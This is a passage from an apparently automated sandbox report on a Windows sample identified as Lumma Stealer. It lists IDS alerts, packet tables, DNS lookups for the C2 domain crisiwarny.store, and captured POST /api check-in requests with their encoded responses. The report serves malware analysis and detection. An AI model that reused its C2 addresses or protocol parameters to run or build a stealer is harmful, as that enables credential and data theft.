                                                                                        2024-10-27T21:06:19.528364+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705104.21.95.91443TCP
                                                                                        2024-10-27T21:06:20.828100+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549706104.21.95.91443TCP

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Oct 27, 2024 21:06:17.128488064 CET49704443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:17.128525019 CET44349704104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:17.128746033 CET49704443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:17.129931927 CET49704443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:17.129956961 CET44349704104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:17.761410952 CET44349704104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:17.761769056 CET49704443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:17.764250994 CET49704443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:17.764277935 CET44349704104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:17.764622927 CET44349704104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:17.817888975 CET49704443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:17.817888975 CET49704443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:17.818208933 CET44349704104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:18.315270901 CET44349704104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:18.315541983 CET44349704104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:18.315663099 CET49704443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:18.317164898 CET49704443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:18.317186117 CET44349704104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:18.317214966 CET49704443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:18.317222118 CET44349704104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:18.370908022 CET49705443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:18.370979071 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:18.371063948 CET49705443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:18.371367931 CET49705443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:18.371387005 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:18.994996071 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:18.995243073 CET49705443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:18.996536016 CET49705443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:18.996548891 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:18.997309923 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:18.998564005 CET49705443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:18.998564005 CET49705443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:18.998646975 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:19.528449059 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:19.528587103 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:19.528701067 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:19.528728962 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:19.528783083 CET49705443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:19.528783083 CET49705443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:19.528836966 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:19.529002905 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:19.529078007 CET49705443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:19.529088020 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:19.529109955 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:19.529139042 CET49705443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:19.529791117 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:19.529839993 CET49705443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:19.529848099 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:19.569525003 CET49705443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:19.645382881 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:19.645643950 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:19.645719051 CET49705443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:19.645750999 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:19.645972013 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:19.646032095 CET49705443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:19.646121979 CET49705443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:19.646142006 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:19.646156073 CET49705443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:19.646162033 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:19.786613941 CET49706443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:19.786658049 CET44349706104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:19.786864042 CET49706443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:19.787152052 CET49706443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:19.787170887 CET44349706104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:20.409256935 CET44349706104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:20.409624100 CET49706443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:20.411274910 CET49706443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:20.411303043 CET44349706104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:20.411730051 CET44349706104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:20.413666010 CET49706443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:20.417109013 CET49706443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:20.417166948 CET44349706104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:20.828190088 CET44349706104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:20.828466892 CET44349706104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:20.828660965 CET49706443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:20.828704119 CET49706443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:20.828725100 CET44349706104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:21.005625010 CET49707443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:21.005664110 CET44349707104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:21.005877972 CET49707443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:21.006140947 CET49707443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:21.006155014 CET44349707104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:21.621306896 CET44349707104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:21.621403933 CET49707443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:21.623167992 CET49707443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:21.623184919 CET44349707104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:21.623682976 CET44349707104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:21.626493931 CET49707443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:21.626902103 CET49707443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:21.626945019 CET44349707104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:21.627011061 CET49707443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:21.627019882 CET44349707104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:22.183753014 CET44349707104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:22.184034109 CET44349707104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:22.184251070 CET49707443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:22.184251070 CET49707443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:22.434727907 CET49708443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:22.434777975 CET44349708104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:22.435102940 CET49708443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:22.435245037 CET49708443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:22.435266018 CET44349708104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:22.491538048 CET49707443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:22.491575003 CET44349707104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:23.055522919 CET44349708104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:23.055840015 CET49708443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:23.057777882 CET49708443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:23.057792902 CET44349708104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:23.057985067 CET44349708104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:23.060035944 CET49708443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:23.060235977 CET49708443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:23.060270071 CET44349708104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:23.060353994 CET49708443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:23.060364962 CET44349708104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:23.757417917 CET44349708104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:23.757545948 CET44349708104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:23.757692099 CET49708443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:23.758084059 CET49708443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:23.758105040 CET44349708104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:24.059568882 CET49710443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:24.059623957 CET44349710104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:24.059727907 CET49710443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:24.060103893 CET49710443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:24.060120106 CET44349710104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:24.677720070 CET44349710104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:24.677840948 CET49710443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:24.693770885 CET49710443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:24.693811893 CET44349710104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:24.694091082 CET44349710104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:24.695483923 CET49710443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:24.695596933 CET49710443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:24.695611000 CET44349710104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:25.230750084 CET44349710104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:25.231053114 CET44349710104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:25.231287003 CET49710443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:25.231287003 CET49710443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:25.745433092 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:25.745501995 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:25.745592117 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:25.746114969 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:25.746128082 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:26.533592939 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:26.533687115 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:26.534854889 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:26.534874916 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:26.535079956 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:26.536290884 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:26.537167072 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:26.537199020 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:26.537293911 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:26.537321091 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:26.537432909 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:26.537465096 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:26.537595987 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:26.537621021 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:26.537786961 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:26.537818909 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:26.537997961 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:26.538027048 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:26.538041115 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:26.538049936 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:26.538206100 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:26.538233995 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:26.538256884 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:26.538392067 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:26.538430929 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:26.548569918 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:26.548755884 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:26.548779011 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:26.548801899 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:26.548818111 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:26.548835039 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:26.548851013 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:26.548863888 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:26.553730011 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:28.350918055 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:28.351191044 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:28.351202011 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:28.351371050 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:28.392110109 CET49733443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:28.392159939 CET44349733104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:28.392326117 CET49733443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:28.392611027 CET49733443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:28.392627001 CET44349733104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:29.038846970 CET44349733104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:29.038933039 CET49733443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:29.039691925 CET49733443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:29.039736986 CET44349733104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:29.039889097 CET44349733104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:29.039951086 CET49733443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:29.039969921 CET49733443192.168.2.5104.21.95.91

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Oct 27, 2024 21:06:17.074382067 CET6409653192.168.2.51.1.1.1
                                                                                        Oct 27, 2024 21:06:17.084762096 CET53640961.1.1.1192.168.2.5
                                                                                        Oct 27, 2024 21:06:17.099704981 CET6130753192.168.2.51.1.1.1
                                                                                        Oct 27, 2024 21:06:17.123224020 CET53613071.1.1.1192.168.2.5

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Oct 27, 2024 21:06:17.074382067 CET192.168.2.51.1.1.10x9342Standard query (0)presticitpo.storeA (IP address)IN (0x0001)false
                                                                                        Oct 27, 2024 21:06:17.099704981 CET192.168.2.51.1.1.10x7333Standard query (0)crisiwarny.storeA (IP address)IN (0x0001)false

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Oct 27, 2024 21:06:17.084762096 CET1.1.1.1192.168.2.50x9342Name error (3)presticitpo.storenonenoneA (IP address)IN (0x0001)false
                                                                                        Oct 27, 2024 21:06:17.123224020 CET1.1.1.1192.168.2.50x7333No error (0)crisiwarny.store104.21.95.91A (IP address)IN (0x0001)false
                                                                                        Oct 27, 2024 21:06:17.123224020 CET1.1.1.1192.168.2.50x7333No error (0)crisiwarny.store172.67.170.64A (IP address)IN (0x0001)false

                                                                                        HTTP Request Dependency Graph

                                                                                        • crisiwarny.store

                                                                                        HTTPS Proxied Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.549704104.21.95.914435536C:\Users\user\Desktop\file.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-27 20:06:17 UTC263OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 8
                                                                                        Host: crisiwarny.store
                                                                                        2024-10-27 20:06:17 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                        Data Ascii: act=life
                                                                                        2024-10-27 20:06:18 UTC1009INHTTP/1.1 200 OK
                                                                                        Date: Sun, 27 Oct 2024 20:06:18 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=49pgrmjcs8jucopoobuebd44ue; expires=Thu, 20 Feb 2025 13:52:57 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YJ%2B9jn%2FiCYB4gEmp6eBjdENblnXVOny96frie6fUsrAqhirebXTKzyw%2FxV1zMvusoe539PRGzaLOncZbK%2FHIWEK3U28EUj8xhG562gIQY9hKYDT5ViyhhaKYYWO8XASbEEqC"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d954e49caf928ab-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1226&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=907&delivery_rate=2571936&cwnd=251&unsent_bytes=0&cid=04b628d3d1863dae&ts=570&x=0"
                                                                                        2024-10-27 20:06:18 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                        Data Ascii: 2ok
                                                                                        2024-10-27 20:06:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.549705104.21.95.914435536C:\Users\user\Desktop\file.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-27 20:06:18 UTC264OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 52
                                                                                        Host: crisiwarny.store
                                                                                        2024-10-27 20:06:18 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
                                                                                        2024-10-27 20:06:19 UTC1005INHTTP/1.1 200 OK
                                                                                        Date: Sun, 27 Oct 2024 20:06:19 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=239mv9pe025t3cddp7vspmr0oe; expires=Thu, 20 Feb 2025 13:52:58 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5MZP8gqPsIZbftSuySPEBSAq83nkM8ib6l0QDkHEM6ys0ux6XtRjEvWvHWVpQNDrk9q39eMeLVMyKOajEP1yYZk6uuLKCT1x0SLlDnKTdAy7ogPBxFCl%2B6Ir3qHXHoM%2FHjDK"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d954e512b822cda-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1396&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=952&delivery_rate=2172543&cwnd=251&unsent_bytes=0&cid=de80c75cd29b734b&ts=547&x=0"
                                                                                        2024-10-27 20:06:19 UTC364INData Raw: 33 66 39 62 0d 0a 36 5a 6d 77 46 48 50 63 79 54 46 54 69 4c 45 33 76 59 71 43 36 6e 66 77 39 6b 77 58 46 63 34 59 4a 6e 55 37 4c 50 56 34 71 31 2b 53 75 38 59 32 53 65 6a 6c 45 79 44 74 6b 77 33 4a 2b 50 65 50 57 39 4b 58 4b 44 55 76 71 48 6c 4b 42 6c 34 41 31 77 37 47 66 64 50 2f 30 58 67 41 75 65 55 54 4e 76 43 54 44 65 62 78 6f 49 38 5a 30 73 78 75 63 6e 2b 73 65 55 6f 58 57 6b 65 61 43 4d 63 38 67 66 58 58 66 42 61 2f 72 56 41 2f 35 64 52 53 32 4f 76 6f 68 42 36 64 6e 69 45 31 4f 65 78 39 58 46 63 42 44 72 67 64 33 7a 36 6b 2b 4d 4e 2f 55 61 48 6c 53 6e 48 74 33 78 57 48 71 4f 4f 50 46 5a 79 51 4b 48 78 39 70 6e 42 43 46 6c 39 47 68 52 48 4e 4e 34 48 37 31 48 30 63 74 72 6c 64 4e 65 4c 66 56 4e 4c 72 6f 4d 5a 56 6c 59 78 75 4c 54 66 2f 53 45 63 47 53
                                                                                        Data Ascii: 3f9b6ZmwFHPcyTFTiLE3vYqC6nfw9kwXFc4YJnU7LPV4q1+Su8Y2SejlEyDtkw3J+PePW9KXKDUvqHlKBl4A1w7GfdP/0XgAueUTNvCTDebxoI8Z0sxucn+seUoXWkeaCMc8gfXXfBa/rVA/5dRS2OvohB6dniE1Oex9XFcBDrgd3z6k+MN/UaHlSnHt3xWHqOOPFZyQKHx9pnBCFl9GhRHNN4H71H0ctrldNeLfVNLroMZVlYxuLTf/SEcGS
                                                                                        2024-10-27 20:06:19 UTC1369INData Raw: 33 6a 36 59 55 59 6b 70 6b 6b 65 6e 53 73 66 55 34 64 56 6b 53 54 46 38 51 37 69 2f 75 53 4f 46 47 35 73 78 4e 70 71 76 42 51 7a 2b 2f 73 6e 6c 65 6f 31 44 45 37 62 75 78 39 53 46 63 42 44 70 38 66 79 6a 36 41 39 4e 46 2b 47 71 79 72 51 54 66 6e 31 6b 66 5a 37 65 36 43 46 6f 43 65 49 48 4e 30 70 58 46 4e 45 6c 35 4b 31 31 53 4a 4f 70 4f 37 69 6a 59 77 73 36 42 66 4f 2f 33 54 46 63 43 6d 2b 63 67 53 6e 74 52 32 4e 58 4f 74 66 6b 55 54 56 30 43 54 46 73 38 7a 68 76 54 55 66 42 47 35 6f 56 73 35 36 39 35 65 30 4f 6a 6c 68 52 47 55 6d 43 39 77 4e 2b 49 36 51 77 38 5a 46 74 63 30 7a 6a 36 5a 75 65 64 31 48 37 43 73 52 58 48 31 6e 55 79 66 37 2b 7a 49 54 64 4b 61 4b 33 70 6c 72 57 68 42 47 55 74 43 6b 68 7a 45 50 6f 58 37 31 33 45 63 73 4b 31 55 4d 75 4c 58 56
                                                                                        Data Ascii: 3j6YUYkpkkenSsfU4dVkSTF8Q7i/uSOFG5sxNpqvBQz+/snleo1DE7bux9SFcBDp8fyj6A9NF+GqyrQTfn1kfZ7e6CFoCeIHN0pXFNEl5K11SJOpO7ijYws6BfO/3TFcCm+cgSntR2NXOtfkUTV0CTFs8zhvTUfBG5oVs5695e0OjlhRGUmC9wN+I6Qw8ZFtc0zj6Zued1H7CsRXH1nUyf7+zITdKaK3plrWhBGUtCkhzEPoX713EcsK1UMuLXV
                                                                                        2024-10-27 20:06:19 UTC1369INData Raw: 49 54 64 4b 59 4a 33 56 38 70 6e 35 45 45 46 52 4c 6c 42 33 4b 4d 49 7a 78 33 48 45 56 73 71 4a 65 4e 2b 72 55 55 64 72 36 35 59 45 5a 6e 74 52 67 4e 58 43 30 4f 68 78 58 64 6b 6d 42 47 65 59 2b 6d 76 4b 53 61 56 2b 6e 36 31 51 39 71 6f 73 56 32 4f 33 6f 67 78 4f 61 6c 44 78 77 65 61 64 37 54 68 46 59 51 35 73 63 79 54 79 4c 2f 64 35 32 46 72 6d 35 51 54 54 73 77 56 2b 66 70 71 43 50 44 64 4c 4d 62 6b 4e 6e 75 32 74 53 56 57 78 4e 6d 52 54 4f 4b 38 76 6b 6e 47 39 52 75 61 63 54 61 61 72 59 56 64 50 76 36 49 34 52 6d 70 73 68 66 47 57 74 64 6b 6f 46 58 6b 36 65 46 4d 59 78 67 76 62 56 65 78 71 30 70 6c 63 32 36 35 4d 62 6e 2b 2f 34 79 45 33 53 6f 6a 35 34 65 34 4a 78 53 42 34 5a 55 64 6b 44 69 54 71 48 75 34 6f 32 46 62 4b 6a 57 54 37 6a 32 56 2f 51 34 65
                                                                                        Data Ascii: ITdKYJ3V8pn5EEFRLlB3KMIzx3HEVsqJeN+rUUdr65YEZntRgNXC0OhxXdkmBGeY+mvKSaV+n61Q9qosV2O3ogxOalDxwead7ThFYQ5scyTyL/d52Frm5QTTswV+fpqCPDdLMbkNnu2tSVWxNmRTOK8vknG9RuacTaarYVdPv6I4RmpshfGWtdkoFXk6eFMYxgvbVexq0plc265Mbn+/4yE3Soj54e4JxSB4ZUdkDiTqHu4o2FbKjWT7j2V/Q4e
